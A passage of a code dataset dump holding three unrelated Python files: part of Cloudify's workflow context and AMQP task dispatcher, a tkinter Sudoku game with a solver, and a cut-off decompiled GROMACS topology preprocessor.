AMQPWrappedThread(target=self._process_local_task,\n name=name, args=(workflow_ctx, ))\n self._local_task_processing_pool.append(thread)\n self.stopped = False\n\n def start(self):\n for thread in self._local_task_processing_pool:\n thread.start()\n if not self._is_local_context:\n for thread in self._local_task_processing_pool:\n thread.started_amqp_client.wait(timeout=30)\n\n def stop(self):\n self.stopped = True\n\n def add_task(self, task):\n self._local_tasks_queue.put(task)\n\n def _process_local_task(self, workflow_ctx):\n # see CFY-1442\n with current_workflow_ctx.push(workflow_ctx):\n while not self.stopped:\n try:\n task = self._local_tasks_queue.get(timeout=1)\n task()\n # may seem too general, but daemon threads are just great.\n # anyway, this is properly unit tested, so we should be good.\n except Exception:\n pass\n\n# Local/Remote Handlers\n\n\nclass CloudifyWorkflowContextHandler(object):\n\n def __init__(self, workflow_ctx):\n self.workflow_ctx = workflow_ctx\n\n def get_context_logging_handler(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_node_logging_handler(self, workflow_node_instance):\n raise NotImplementedError('Implemented by subclasses')\n\n @property\n def bootstrap_context(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_send_task_event_func(self, task):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n raise NotImplementedError('Implemented by subclasses')\n\n @property\n def operation_cloudify_context(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n raise NotImplementedError('Implemented by subclasses')\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n raise NotImplementedError('Implemented by subclasses')\n\n def start_deployment_modification(self, nodes):\n raise NotImplementedError('Implemented by subclasses')\n\n def finish_deployment_modification(self, modification):\n raise NotImplementedError('Implemented by subclasses')\n\n def rollback_deployment_modification(self, modification):\n raise NotImplementedError('Implemented by subclasses')\n\n def list_deployment_modifications(self, status):\n raise NotImplementedError('Implemented by subclasses')\n\n def scaling_groups(self):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_operations(self, graph_id):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_tasks_graph(self, execution_id, name):\n raise NotImplementedError('Implemented by subclasses')\n\n def update_operation(self, operation_id, state):\n raise NotImplementedError('Implemented by subclasses')\n\n def store_tasks_graph(self, execution_id, name, operations):\n raise NotImplementedError('Implemented by subclasses')\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n raise NotImplementedError('Implemented by subclasses')\n\n def remove_operation(self, operation_id):\n raise NotImplementedError('Implemented by subclasses')\n\n def get_execution(self, execution_id):\n raise NotImplementedError('Implemented by subclasses')\n\n\nclass _TaskDispatcher(object):\n def __init__(self):\n self._tasks = {}\n self._logger = logging.getLogger('dispatch')\n\n def make_subtask(self, tenant, target, task_id, queue, kwargs):\n task = {\n 'id': task_id,\n 'tenant': tenant,\n 'target': target,\n 
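# this dict is the in-memory task envelope: routing information plus\n # the serialized 'cloudify_task' payload that handler.publish() sends\n # to the operation queue below\n 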
'queue': queue,\n 'task': {\n 'id': task_id,\n 'cloudify_task': {'kwargs': kwargs},\n }\n }\n handler = amqp_client.CallbackRequestResponseHandler(task['target'])\n client = self._get_client(task)\n client.add_handler(handler)\n task.update({\n 'client': client,\n 'handler': handler\n })\n return task\n\n def _get_client(self, task):\n if task['queue'] == MGMTWORKER_QUEUE:\n client = amqp_client.get_client()\n else:\n tenant = utils.get_tenant()\n client = amqp_client.get_client(\n amqp_user=tenant.rabbitmq_username,\n amqp_pass=tenant.rabbitmq_password,\n amqp_vhost=tenant.rabbitmq_vhost\n )\n return client\n\n def send_task(self, workflow_task, task):\n agent = task['target']\n handler = task['handler']\n if task['target'] != MGMTWORKER_QUEUE \\\n and not is_agent_alive(agent, task['client'], connect=False):\n raise exceptions.RecoverableError(\n 'Timed out waiting for agent: {0}'.format(agent))\n\n handler.publish(task['task'], routing_key='operation',\n correlation_id=task['id'])\n self._logger.debug('Task [{0}] sent'.format(task['id']))\n\n def wait_for_result(self, result, workflow_task, task):\n client, handler = task['client'], task['handler']\n callback = functools.partial(self._received, task['id'], client)\n handler.callbacks[task['id']] = callback\n self._tasks.setdefault(client, {})[task['id']] = \\\n (workflow_task, task, result)\n client.consume_in_thread()\n handler.make_response_queue(task['id'])\n return result\n\n def _set_task_state(self, workflow_task, state, event=None):\n with current_workflow_ctx.push(workflow_task.workflow_context):\n workflow_task.set_state(state)\n if event is not None:\n events.send_task_event(\n state, workflow_task,\n events.send_task_event_func_remote, event)\n\n def _received(self, task_id, client, response):\n self._logger.debug(\n '[{0}] Response received - {1}'.format(task_id, response)\n )\n try:\n if not response:\n return\n try:\n workflow_task, task, result = \\\n self._tasks[client].pop(task_id)\n except KeyError:\n return\n if workflow_task.is_terminated:\n return\n\n error = response.get('error')\n if error:\n exception = deserialize_known_exception(error)\n if isinstance(exception, exceptions.OperationRetry):\n state = TASK_RESCHEDULED\n else:\n state = TASK_FAILED\n self._set_task_state(workflow_task, state)\n result.result = exception\n else:\n state = TASK_SUCCEEDED\n self._set_task_state(workflow_task, state, {\n 'result': response.get('result')\n })\n result.result = response.get('result')\n\n self._maybe_stop_client(client)\n except Exception:\n self._logger.error('Error occurred while processing task',\n exc_info=True)\n raise\n\n def _maybe_stop_client(self, client):\n if self._tasks[client]:\n return\n self._tasks.pop(client)\n # we are running in a callback - on the consumer thread. 
No reason to\n # try and wait (join) for the thread we're running on to be closed\n client.close(wait=False)\n\n\nclass RemoteContextHandler(CloudifyWorkflowContextHandler):\n def __init__(self, *args, **kwargs):\n super(RemoteContextHandler, self).__init__(*args, **kwargs)\n self._dispatcher = _TaskDispatcher()\n\n @property\n def bootstrap_context(self):\n return get_bootstrap_context()\n\n def get_send_task_event_func(self, task):\n return events.send_task_event_func_remote\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n # augment cloudify context with target and queue\n tenant = tenant or workflow_task.cloudify_context.get('tenant')\n\n # Remote task\n return self._dispatcher.make_subtask(\n tenant, target, task_id=workflow_task.id,\n kwargs=workflow_task.kwargs, queue=queue)\n\n def send_task(self, workflow_task, task):\n return self._dispatcher.send_task(workflow_task, task)\n\n def wait_for_result(self, result, workflow_task, task):\n return self._dispatcher.wait_for_result(result, workflow_task, task)\n\n @property\n def operation_cloudify_context(self):\n return {'local': False,\n 'bypass_maintenance': utils.get_is_bypass_maintenance(),\n 'rest_token': utils.get_rest_token(),\n 'execution_token': utils.get_execution_token(),\n 'execution_creator_username':\n utils.get_execution_creator_username()}\n\n def download_deployment_resource(self,\n blueprint_id,\n deployment_id,\n tenant_name,\n resource_path,\n target_path=None):\n logger = self.workflow_ctx.logger\n return download_resource(blueprint_id=blueprint_id,\n deployment_id=deployment_id,\n tenant_name=tenant_name,\n resource_path=resource_path,\n target_path=target_path,\n logger=logger)\n\n def get_operations(self, graph_id):\n client = get_rest_client()\n ops = []\n offset = 0\n while True:\n operations = client.operations.list(graph_id, _offset=offset)\n ops += operations.items\n if len(ops) < operations.metadata.pagination.total:\n offset += operations.metadata.pagination.size\n else:\n break\n return ops\n\n def update_operation(self, operation_id, state):\n client = get_rest_client()\n client.operations.update(operation_id, state=state)\n\n def get_tasks_graph(self, execution_id, name):\n client = get_rest_client()\n graphs = client.tasks_graphs.list(execution_id, name)\n if graphs:\n return graphs[0]\n\n def store_tasks_graph(self, execution_id, name, operations):\n client = get_rest_client()\n return client.tasks_graphs.create(execution_id, name, operations)\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n client = get_rest_client()\n client.operations.create(\n operation_id=id,\n graph_id=graph_id,\n name=name,\n type=type,\n dependencies=dependencies,\n parameters=parameters)\n\n def remove_operation(self, operation_id):\n client = get_rest_client()\n client.operations.delete(operation_id)\n\n def get_execution(self, execution_id):\n client = get_rest_client()\n return client.executions.get(execution_id)\n\n\nclass RemoteCloudifyWorkflowContextHandler(RemoteContextHandler):\n\n _scaling_groups = None\n\n def get_node_logging_handler(self, workflow_node_instance):\n return CloudifyWorkflowNodeLoggingHandler(workflow_node_instance,\n out_func=logs.amqp_log_out)\n\n def get_context_logging_handler(self):\n return CloudifyWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.amqp_log_out)\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n return super(RemoteCloudifyWorkflowContextHandler, self) \\\n 
.download_deployment_resource(\n blueprint_id=self.workflow_ctx.blueprint.id,\n deployment_id=self.workflow_ctx.deployment.id,\n tenant_name=self.workflow_ctx.tenant_name,\n resource_path=resource_path,\n target_path=target_path)\n\n def start_deployment_modification(self, nodes):\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n modification = client.deployment_modifications.start(\n deployment_id=deployment_id,\n nodes=nodes,\n context={\n 'blueprint_id': self.workflow_ctx.blueprint.id,\n 'deployment_id': deployment_id,\n 'execution_id': self.workflow_ctx.execution_id,\n 'workflow_id': self.workflow_ctx.workflow_id,\n })\n return Modification(self.workflow_ctx, modification)\n\n def finish_deployment_modification(self, modification):\n client = get_rest_client()\n client.deployment_modifications.finish(modification.id)\n\n def rollback_deployment_modification(self, modification):\n client = get_rest_client()\n client.deployment_modifications.rollback(modification.id)\n\n def list_deployment_modifications(self, status):\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n modifications = client.deployment_modifications.list(\n deployment_id=deployment_id,\n status=status)\n return [Modification(self.workflow_ctx, m) for m in modifications]\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_workflow_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context,\n out_func=logs.amqp_event_out)\n\n @property\n def scaling_groups(self):\n if not self._scaling_groups:\n deployment_id = self.workflow_ctx.deployment.id\n client = get_rest_client()\n deployment = client.deployments.get(\n deployment_id, _include=['scaling_groups'])\n self._scaling_groups = deployment['scaling_groups']\n return self._scaling_groups\n\n\nclass SystemWideWfRemoteContextHandler(RemoteContextHandler):\n\n def get_context_logging_handler(self):\n return SystemWideWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.amqp_log_out)\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_sys_wide_wf_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context,\n out_func=logs.amqp_event_out)\n\n\nclass LocalCloudifyWorkflowContextHandler(CloudifyWorkflowContextHandler):\n\n def __init__(self, workflow_ctx, storage):\n super(LocalCloudifyWorkflowContextHandler, self).__init__(\n workflow_ctx)\n self.storage = storage\n self._send_task_event_func = None\n\n def get_context_logging_handler(self):\n return CloudifyWorkflowLoggingHandler(self.workflow_ctx,\n out_func=logs.stdout_log_out)\n\n def get_node_logging_handler(self, workflow_node_instance):\n return CloudifyWorkflowNodeLoggingHandler(workflow_node_instance,\n out_func=logs.stdout_log_out)\n\n @property\n def bootstrap_context(self):\n return {}\n\n def get_send_task_event_func(self, task):\n return events.send_task_event_func_local\n\n def get_task(self, workflow_task, queue=None, target=None, tenant=None):\n raise NotImplementedError('Not implemented by local workflow tasks')\n\n @property\n def operation_cloudify_context(self):\n return {'local': True,\n 'storage': self.storage}\n\n def send_workflow_event(self, event_type, message=None, args=None,\n additional_context=None):\n send_workflow_event(self.workflow_ctx,\n event_type=event_type,\n message=message,\n args=args,\n 
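# out_func below writes events to stdout for local workflow runs;\n # the remote handler above uses logs.amqp_event_out to route them\n # through RabbitMQ instead\n 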
additional_context=additional_context,\n out_func=logs.stdout_event_out)\n\n def download_deployment_resource(self,\n resource_path,\n target_path=None):\n return self.storage.download_resource(resource_path=resource_path,\n target_path=target_path)\n\n @property\n def scaling_groups(self):\n return self.storage.plan.get('scaling_groups', {})\n\n # resumable workflows operations - not implemented for local\n def get_tasks_graph(self, execution_id, name):\n pass\n\n def update_operation(self, operation_id, state):\n pass\n\n def store_tasks_graph(self, execution_id, name, operations):\n pass\n\n def store_operation(self, graph_id, dependencies,\n id, name, type, parameters, **kwargs):\n pass\n\n def remove_operation(self, operation_id):\n pass\n\n def get_execution(self, execution_id):\n return self.storage.get_execution(execution_id)\n\n\nclass Modification(object):\n\n def __init__(self, workflow_ctx, modification):\n self._raw_modification = modification\n self.workflow_ctx = workflow_ctx\n node_instances = modification.node_instances\n added_raw_nodes = []\n seen_ids = set()\n for instance in node_instances.added_and_related:\n if instance.node_id not in seen_ids:\n added_raw_nodes.append(\n workflow_ctx.get_node(instance.node_id)._node)\n seen_ids.add(instance.node_id)\n\n added_raw_node_instances = node_instances.added_and_related\n self._added = ModificationNodes(self,\n added_raw_nodes,\n added_raw_node_instances)\n\n removed_raw_nodes = []\n seen_ids = set()\n for instance in node_instances.removed_and_related:\n if instance.node_id not in seen_ids:\n removed_raw_nodes.append(\n workflow_ctx.get_node(instance.node_id)._node)\n seen_ids.add(instance.node_id)\n\n removed_raw_node_instances = node_instances.removed_and_related\n self._removed = ModificationNodes(self,\n removed_raw_nodes,\n removed_raw_node_instances)\n\n @property\n def added(self):\n \"\"\"\n :return: Added and related nodes\n :rtype: ModificationNodes\n \"\"\"\n return self._added\n\n @property\n def removed(self):\n \"\"\"\n :return: Removed and related nodes\n :rtype: ModificationNodes\n \"\"\"\n return self._removed\n\n @property\n def id(self):\n return self._raw_modification.id\n\n def finish(self):\n \"\"\"Finish deployment modification process\"\"\"\n self.workflow_ctx.internal.handler.finish_deployment_modification(\n self._raw_modification)\n\n def rollback(self):\n \"\"\"Rollback deployment modification process\"\"\"\n self.workflow_ctx.internal.handler.rollback_deployment_modification(\n self._raw_modification)\n\n\nclass ModificationNodes(WorkflowNodesAndInstancesContainer):\n def __init__(self, modification, raw_nodes, raw_node_instances):\n super(ModificationNodes, self).__init__(\n modification.workflow_ctx,\n raw_nodes,\n raw_node_instances\n )\n\n\nclass WorkflowDeploymentContext(context.DeploymentContext):\n\n def __init__(self, cloudify_context, workflow_ctx):\n super(WorkflowDeploymentContext, self).__init__(cloudify_context)\n self.workflow_ctx = workflow_ctx\n\n def start_modification(self, nodes):\n \"\"\"Start deployment modification process\n\n :param nodes: Modified nodes specification\n :return: Workflow modification wrapper\n :rtype: Modification\n \"\"\"\n handler = self.workflow_ctx.internal.handler\n modification = handler.start_deployment_modification(nodes)\n self.workflow_ctx.refresh_node_instances()\n return modification\n\n def list_started_modifications(self):\n \"\"\"List modifications already started (and not finished)\n\n :return: A list of workflow modification wrappers\n 
:rtype: list of Modification\n \"\"\"\n handler = self.workflow_ctx.internal.handler\n return handler.list_deployment_modifications(\n DeploymentModificationState.STARTED)\n\n @property\n def scaling_groups(self):\n return self.workflow_ctx.internal.handler.scaling_groups\n\n\ndef task_config(fn=None, **arguments):\n if fn is not None:\n @functools.wraps(fn)\n def wrapper(*args, **kwargs):\n return fn(*args, **kwargs)\n wrapper.workflow_task_config = arguments\n return wrapper\n else:\n def partial_wrapper(func):\n return task_config(func, **arguments)\n return partial_wrapper\n","sub_path":"cloudify/workflows/workflow_context.py","file_name":"workflow_context.py","file_ext":"py","file_size_in_byte":64864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"198176155","text":"from tkinter import *\nfrom tkinter import filedialog\n\nclass SudokuCell(Label):\n '''represents a Sudoku cell'''\n\n def __init__(self,master):\n '''SudokuCell(master) -> SudokuCell\n creates a new blank SudokuCell'''\n Label.__init__(self,master,height=1,width=2,text='',\\\n bg='white',font=('Arial',24))\n self.number = 0 # 0 represents an empty cell\n self.readOnly = False # starts as changeable\n self.highlighted = False # starts unhighlighted\n self.possibles = {1,2,3,4,5,6,7,8,9} # set of possible fills\n # set up listeners\n self.bind('',self.highlight)\n self.bind('',self.change)\n\n def get_cell(self):\n '''SudokoCell.get_cell() -> int\n returns the number in the cell (0 if empty)'''\n return self.number\n\n def is_read_only(self):\n '''SudokuCell.is_read_only() -> boolean\n returns True if the cell is read-only, False if not'''\n return self.readOnly\n\n def is_highlighted(self):\n '''SudokuCell.is_highlighted() -> boolean\n returns True if the cell is highlighted, False if not'''\n return self.highlighted\n\n def set_cell(self,value,readOnly=False):\n '''SudokuCell.set_cell(value,[readonly])\n sets the number in the cell and unhighlights\n readOnly=True sets the cell to be read-only'''\n self.number = value\n self.readOnly = readOnly\n self.unhighlight() # unhighlight the cell after setting it\n # update the cell and check if we created any bad cells\n self.master.update_cells()\n\n def update_cell(self,badCell=False):\n '''SudokuCell.update_cell()\n displays the number in the cell\n displays as:\n empty if its value is 0\n black if user-entered and legal\n gray if read-only and legal\n red when badCell is True'''\n if self.number == 0: # cell is empty\n self['text'] = ''\n else: # cell has a number\n self['text'] = str(self.number) # display the number\n # set the color\n if badCell:\n self['fg'] = 'red'\n elif self.readOnly:\n self['fg'] = 'dim gray'\n else:\n self['fg'] = 'black'\n\n def highlight(self,event):\n '''SudokuCell.highlight(event)\n handler function for mouse click\n highlights the cell if it can be edited (non-read-only)'''\n if not self.readOnly: # only act on non-read-only cells\n self.master.unhighlight_all() # unhighlight any other cells\n self.focus_set() # set the focus so we can capture key presses\n self.highlighted = True\n self['bg'] = 'lightgrey'\n\n def unhighlight(self):\n '''SudokuCell.unhighlight()\n unhighlights the cell (changes background to white)'''\n self.highlighted = False\n self['bg'] = 'white'\n\n def change(self,event):\n '''SudokuCell.change(event)\n handler function for key press\n only works on editable (non-read-only) and highlighted cells\n if a number key was pressed: sets cell to that number\n if a 
backspace/delete key was pressed: deletes the number'''\n # only act if the cell is editable and highlighted\n if not self.readOnly and self.highlighted:\n if '1' <= event.char <= '9': # number press -- set the cell\n self.set_cell(int(event.char))\n elif event.keysym in ['BackSpace','Delete','KP_Delete']:\n # delete the cell's contents by setting it to 0\n self.set_cell(0)\n\n def set_possibles(self,value):\n '''SudokuCell.set_possibles()\n sets the set of possible fills'''\n self.possibles = value\n\n def get_possibles(self):\n '''SudokuCell.get_possibles()\n gets the set of possible fills'''\n return self.possibles\n \nclass SudokuGrid(Frame):\n '''object for a Sudoku grid'''\n\n def __init__(self,master):\n '''SudokuGrid(master)\n creates a new blank Sudoku grid'''\n # initialize a new Frame\n Frame.__init__(self,master,bg='black')\n self.grid()\n # put in lines between the cells\n # (odd numbered rows and columns in the grid)\n for n in range(1,17,2):\n self.rowconfigure(n,minsize=1)\n self.columnconfigure(n,minsize=1)\n # thicker lines between 3x3 boxes and at the bottom\n self.columnconfigure(5,minsize=3)\n self.columnconfigure(11,minsize=3)\n self.rowconfigure(5,minsize=3)\n self.rowconfigure(11,minsize=3)\n self.rowconfigure(17,minsize=1) # space at the bottom\n # create buttons\n self.buttonFrame = Frame(self,bg='white') # new frame to hold buttons\n Button(self.buttonFrame,text='Load Grid',command=self.load_grid).grid(row=0,column=0)\n Button(self.buttonFrame,text='Save Grid',command=self.save_grid).grid(row=0,column=1)\n Button(self.buttonFrame,text='Solve',command=self.solve).grid(row=0,column=2)\n Button(self.buttonFrame,text='Reset',command=self.reset).grid(row=0,column=3)\n self.buttonFrame.grid(row=18,column=0,columnspan=17)\n # create the cells\n self.cells = {} # set up dictionary for cells\n for row in range(9):\n for column in range(9):\n self.cells[(row,column)] = SudokuCell(self)\n # cells go in even-numbered rows/columns of the grid\n self.cells[(row,column)].grid(row=2*row,column=2*column)\n # set up boxes (the 3x3 regions)\n self.boxes = [] # list to store the boxes\n # boxes start at rows/columns that are multiples of 3\n # each box is a list of 9 cells\n for row in [0,3,6]:\n for column in [0,3,6]:\n boxList = [] # list to store the coordinates of the cells in the box\n # loop over a 3x3 region\n for i in range(3):\n for j in range(3):\n boxList.append((row+i,column+j)) # add box to list\n self.boxes.append(boxList) # add the box to the master list of boxes\n\n def unhighlight_all(self):\n '''SudokuGrid.unhighlight_all()\n unhighlight all the cells in the grid'''\n for cell in self.cells:\n self.cells[cell].unhighlight()\n\n def update_cells(self):\n '''SudokuGrid.update_cells()\n check for good/bad cells and update their color'''\n for row in range(9):\n for column in range(9):\n foundBad = False\n number = self.cells[(row,column)].get_cell()\n if number > 0: # only need to check non-empty cells\n # check all other cells in the same row and column\n for n in range(9):\n if n != column: # look at all other cells in the row\n if self.cells[(row,n)].get_cell() == number:\n foundBad = True\n if n != row: # look at all other cells in the column\n if self.cells[(n,column)].get_cell() == number:\n foundBad = True\n # find box and check other cells in box\n for box in self.boxes:\n if (row,column) in box: # we've got the right box\n # check other cells in box\n for cell in box:\n if cell != (row,column):\n if self.cells[cell].get_cell() == number:\n foundBad = True\n # 
update the cell\n self.cells[(row,column)].update_cell(foundBad)\n\n def load_grid(self):\n '''SudokuGrid.load_grid()\n loads a Sudoku grid from a file'''\n # get filename using tkinter's open file pop-up\n filename = filedialog.askopenfilename(defaultextension='.txt')\n # make sure they chose a file and didn't click \"cancel\"\n if filename:\n # open the file and read rows into a list\n sudokufile = open(filename,'r')\n rowList = sudokufile.readlines()\n sudokufile.close()\n # process file data\n for row in range(9):\n for column in range(9):\n # get column'th character from line row\n value = int(rowList[row][column])\n # set the cell\n # if value is nonzero, cell is read-only\n self.cells[(row,column)].set_cell(value, value != 0)\n\n def save_grid(self):\n '''SudokuGrid.save_grid()\n saves the Sudoku grid to a file'''\n # get filename using tkinter's save file pop-up\n filename = filedialog.asksaveasfilename(defaultextension='.txt')\n # make sure they chose a file and didn't click \"cancel\"\n if filename:\n sudokufile = open(filename,'w') # open file for writing\n for row in range(9):\n for column in range(9):\n # add cell to file\n sudokufile.write(str(self.cells[(row,column)].get_cell()))\n sudokufile.write('\\n') # new row\n sudokufile.close()\n\n def reset(self):\n '''SudokuGrid.reset()\n clears all non-read-only cells'''\n for cell in self.cells:\n # only clear non-read-only cells\n if not self.cells[cell].is_read_only():\n self.cells[cell].set_cell(0)\n\n def solve(self):\n '''SudokuGrid.solve()\n solves the Sudoku grid (if possible)\n pops up dialog box at the end indicating the solved status'''\n self.reset()\n makingProgress = True\n while makingProgress:\n makingProgress = self.fill_in_no_brainers() or self.fill_in_only_possibles()\n\n def find_box(self,row,column):\n '''SudokuGrid.find_box(row,column) -> list\n given cell coordinates, returns the box that the cell is in\n (as a list of coordinates)'''\n for box in self.boxes:\n if (row,column) in box:\n return box\n\n def fill_in_no_brainers(self):\n '''SudokuGrid.fill_in_no_brainers() -> boolean\n fills in all the \"no-brainer\" squares: those squares that can\n take only one possible number\n returns True if any get filled in, False if none get filled in.'''\n makingProgress = False # will get set to True if we fill something\n # set the possibles for each cell\n self.set_possibles()\n # loop through grid\n for row in range(9):\n for column in range(9):\n # only consider blank cells\n if self.cells[(row,column)].get_cell() == 0:\n possibles = self.cells[(row,column)].get_possibles()\n # check if only one number\n if len(possibles) == 1:\n num = possibles.pop() # get the number\n # set the cell\n self.cells[(row,column)].set_cell(num)\n makingProgress = True # we've made progress!\n return makingProgress\n\n def set_possibles(self):\n '''SudokuGrid.set_possibles()\n sets the possibles set for each cell'''\n \n # loop through the grid\n for row in range(9):\n for column in range(9):\n # only consider blank cells\n if self.cells[(row,column)].get_cell() == 0:\n otherNumbers = set() # track other numbers\n for n in range(9): # numbers in row and column\n otherNumbers.add(self.cells[(row,n)].get_cell())\n otherNumbers.add(self.cells[(n,column)].get_cell())\n box = self.find_box(row,column)\n for cell in box: # numbers in box\n otherNumbers.add(self.cells[cell].get_cell())\n # numbers not found are possible\n possibleNumbers = set()\n for num in range(1,10):\n if num not in otherNumbers:\n possibleNumbers.add(num)\n 
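The `set_possibles` / `fill_in_no_brainers` pair is classic naked-single constraint propagation. Here is the same idea without the Tkinter plumbing, as a rough sketch (function names are illustrative, and `grid` is the plain 9x9 list used in the conflict sketch above):

def candidates(grid, r, c):
    """Digits 1-9 not already used in the cell's row, column, or box."""
    used = set(grid[r]) | {grid[n][c] for n in range(9)}
    br, bc = 3 * (r // 3), 3 * (c // 3)
    used |= {grid[br + i][bc + j] for i in range(3) for j in range(3)}
    return set(range(1, 10)) - used

def fill_naked_singles(grid):
    """Repeatedly fill cells that have exactly one candidate; return
    True if anything was placed at all."""
    progress, placed = False, True
    while placed:
        placed = False
        for r in range(9):
            for c in range(9):
                if grid[r][c] == 0:
                    cand = candidates(grid, r, c)
                    if len(cand) == 1:
                        grid[r][c] = cand.pop()
                        placed = progress = True
    return progress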
self.cells[(row,column)].set_possibles(possibleNumbers)\n\n def fill_in_only_possibles(self):\n '''SudokuGrid.fill_in_only_possibles() -> boolean\n fills in any cell with only one possible number\n returns True if any get filled in, False if none get filled in'''\n makingProgress = False # will get set to True if we fill something\n # set the possibles for each cell\n self.set_possibles()\n # loop through rows\n for row in range(9):\n # look for a number that's only possible in one square of the row\n for number in range(1,10):\n possibleColumns = []\n for column in range(9):\n # look at possible list for blank cells\n if self.cells[(row,column)].get_cell() == 0 and \\\n number in self.cells[(row,column)].get_possibles():\n possibleColumns.append(column)\n # see if we got only one column\n if len(possibleColumns) == 1:\n # place the number!\n self.cells[(row,possibleColumns[0])].set_cell(number)\n makingProgress = True # we're making progress!\n # update possibles\n self.set_possibles()\n # loop through columns\n for column in range(9):\n # look for a number that's only possible in one square of the column\n for number in range(1,10):\n possibleRows = []\n for row in range(9):\n # look at possible list for blank cells\n if self.cells[(row,column)].get_cell() == 0 and \\\n number in self.cells[(row,column)].get_possibles():\n possibleRows.append(row)\n # see if we got only one column\n if len(possibleRows) == 1:\n # place the number!\n self.cells[(possibleRows[0],column)].set_cell(number)\n makingProgress = True # we're making progress!\n # update possibles\n self.set_possibles()\n # loop through boxes\n for box in self.boxes:\n # look for a number that's only possible in one square of the box\n for number in range(1,10):\n possibleCells = []\n for cell in box:\n # look at possible list for blank cells\n if self.cells[cell].get_cell() == 0 and \\\n number in self.cells[cell].get_possibles():\n possibleCells.append(cell)\n # see if we got only one cell\n if len(possibleCells) == 1:\n # place the number!\n self.cells[possibleCells[0]].set_cell(number)\n makingProgress = True # we're making progress!\n return makingProgress\n\n# main loop for the game\ndef sudoku():\n '''sudoku()\n plays sudoku'''\n root = Tk()\n root.title('Sudoku')\n sg = SudokuGrid(root)\n root.mainloop()\n\nsudoku()","sub_path":"sudoku_tkinter.py","file_name":"sudoku_tkinter.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70278462","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /opt/miniconda3/envs/gmxbatch/lib/python3.7/site-packages/gmxbatch/topfilter/topologyfilter.py\n# Compiled at: 2020-03-09 07:07:33\n# Size of source mod 2**32: 6109 bytes\nimport warnings\nfrom typing import Tuple, List, Optional, Sequence, Dict\n\nclass ParseError(Exception):\n __doc__ = 'Error raised when a parsing error occurs.'\n\n\nclass TopologyFilter:\n __doc__ = 'Simple preprocessor for GROMACS topology files\\n '\n filename: str\n defines: Dict[(str, List[str])]\n ifdefs: List[Tuple[(str, bool)]]\n section = None\n section: Optional[str]\n handleincludes = True\n handleincludes: bool\n handleifdefs = True\n handleifdefs: bool\n handleempty = True\n handleempty: bool\n\n def __init__(self, filename: str, defines: Optional[Sequence[str]]=None, handleincludes: bool=True, handleifdefs: bool=True, handleempty: bool=True):\n 
\"\"\"Initialize the preprocessor\n\n :param filename: main file name\n :type filename: str\n :param defines: set of defined macros\n :type defines: set of str\n :param handleincludes: if True, follow #include directives. If False, pass them through\n :type handleincludes: bool\n :param handleifdefs: if True, handle preprocessor conditionals. If False, pass them throgh\n :type handleifdefs: bool\n :param handleempty: if True, hide empty (or pure comment) lines. If False, pass them through\n :type handleempty: bool\n \"\"\"\n self.handleempty = handleempty\n self.handleincludes = handleincludes\n self.handleifdefs = handleifdefs\n self.defines = dict(zip(defines, [[]] * len(defines))) if defines else {}\n self.filename = filename\n self.ifdefs = []\n\n def parse(self, filename: Optional[str]=None):\n \"\"\"Start parsing the file.\n\n This is a generator. Yields the following:\n - stripped line (str),\n - comment (str or None),\n - current section name (str or None),\n - file name (str),\n - line number (int),\n - full line (str)\n\n Empty lines, are not yielded.\n\n #ifdef/#ifndef/#else/#endif lines are only yielded if `self.handleifdefs` is set to False.\n\n #include lines are only yielded if `self.handleincludes` is set to False.\n\n :param filename: the file name to parse. Do not set this by yourself, leave it None\n :type filename: str or None\n \"\"\"\n if filename is None:\n filename = self.filename\n self.ifdefs = []\n self.section = None\n with open(filename, 'rt') as (f):\n for i, line in enumerate(f, start=1):\n try:\n l, *comment = line.split(';', 1)\n comment = None if not comment else comment[0]\n l = l.strip()\n if l.startswith('#ifdef') and self.handleifdefs:\n _, macro = l.split()\n self.ifdefs.append((macro, True))\n else:\n if l.startswith('#ifndef') and self.handleifdefs:\n _, macro = l.split()\n self.ifdefs.append((macro, False))\n else:\n if l.startswith('#else') and self.handleifdefs:\n self.ifdefs[-1] = (\n self.ifdefs[(-1)][0], not self.ifdefs[(-1)][1])\n else:\n if l.startswith('#endif') and self.handleifdefs:\n del self.ifdefs[-1]\n else:\n if l.startswith('#include'):\n if self.handleincludes:\n _, incfilename = l.split()\n if incfilename.startswith('\"'):\n if not (incfilename.endswith('\"') or incfilename.startswith('<') and incfilename.endswith('>')):\n raise ParseError(f\"Invalid #include directive in file {f.name} at line #{i}.\")\n self.parse(incfilename)\n else:\n pass\n if self.ifdefs_allow_reading() or self.handleifdefs or l.startswith('#define'):\n _, macro, *values = l.split()\n self.defines[macro] = values\n else:\n if l.startswith('#undef'):\n _, macro = l.split()\n del self.defines[macro]\n else:\n if l.startswith('#error'):\n _, message = l.split(None, 1)\n raise ParseError(f\"#error directive encountered with message: {message}\")\n else:\n if l.startswith('#warn'):\n directive, message = l.split(None, 1)\n warnings.warn(f\"{directive} directive encountered with message: {message}\")\n else:\n if l.startswith('[') and l.endswith(']'):\n self.section = 